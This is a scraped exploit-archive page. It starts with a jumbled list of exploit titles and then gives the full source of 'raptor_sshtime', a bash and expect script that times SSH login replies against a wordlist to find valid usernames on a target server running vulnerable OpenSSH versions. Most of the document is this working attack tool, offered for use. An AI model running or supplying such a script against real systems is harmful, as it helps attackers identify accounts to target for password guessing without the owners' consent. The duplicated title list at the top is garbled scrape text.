477bcbdcc0
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
87 lines
2.3 KiB
Bash
Executable file
87 lines
2.3 KiB
Bash
Executable file
#!/bin/bash
|
|
|
|
#
|
|
# $Id: raptor_sshtime,v 1.1 2007/02/13 16:38:57 raptor Exp $
|
|
#
|
|
# raptor_sshtime - [Open]SSH remote timing attack exploit
|
|
# Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>
|
|
#
|
|
# OpenSSH-portable 3.6.1p1 and earlier with PAM support enabled immediately
|
|
# sends an error message when a user does not exist, which allows remote
|
|
# attackers to determine valid usernames via a timing attack (CVE-2003-0190).
|
|
#
|
|
# OpenSSH portable 4.1 on SUSE Linux, and possibly other platforms and versions,
|
|
# and possibly under limited configurations, allows remote attackers to
|
|
# determine valid usernames via timing discrepancies in which responses take
|
|
# longer for valid usernames than invalid ones, as demonstrated by sshtime.
|
|
# NOTE: as of 20061014, it appears that this issue is dependent on the use of
|
|
# manually-set passwords that causes delays when processing /etc/shadow due to
|
|
# an increased number of rounds (CVE-2006-5229).
|
|
#
|
|
# This is a simple shell script based on expect meant to remotely analyze
|
|
# timing differences in sshd "Permission denied" replies. Depending on OpenSSH
|
|
# version and configuration, it may lead to disclosure of valid usernames.
|
|
#
|
|
# Usage example:
|
|
# [make sure the target hostkey has been approved before]
|
|
# ./sshtime 192.168.0.1 dict.txt
|
|
#
|
|
|
|
# Some vars
|
|
port=22
|
|
|
|
# Command line
|
|
host=$1
|
|
dict=$2
|
|
|
|
# Local functions
|
|
function head() {
|
|
echo ""
|
|
echo "raptor_sshtime - [Open]SSH remote timing attack exploit"
|
|
echo "Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>"
|
|
echo ""
|
|
}
|
|
|
|
function foot() {
|
|
echo ""
|
|
exit 0
|
|
}
|
|
|
|
function usage() {
|
|
head
|
|
echo "[make sure the target hostkey has been approved before]"
|
|
echo ""
|
|
echo "usage : ./sshtime <target> <wordlist>"
|
|
echo "example: ./sshtime 192.168.0.1 dict.txt"
|
|
foot
|
|
}
|
|
|
|
function notfound() {
|
|
head
|
|
echo "error : expect interpreter not found!"
|
|
foot
|
|
}
|
|
|
|
# Check if expect is there
|
|
expect=`which expect 2>/dev/null`
|
|
if [ $? -ne 0 ]; then
|
|
notfound
|
|
fi
|
|
|
|
# Input control
|
|
if [ -z "$2" ]; then
|
|
usage
|
|
fi
|
|
|
|
# Perform the bruteforce attack
|
|
head
|
|
|
|
for user in `cat $dict`
|
|
do
|
|
echo -ne "$user@$host\t\t"
|
|
(time -p $expect -c "log_user 0; spawn -noecho ssh -p $port $host -l $user; for {} 1 {} {expect -nocase \"password*\" {send \"dummy\r\"} eof {exit}}") 2>&1 | grep real
|
|
done
|
|
|
|
foot
|
|
|
|
# milw0rm.com [2007-02-13]
|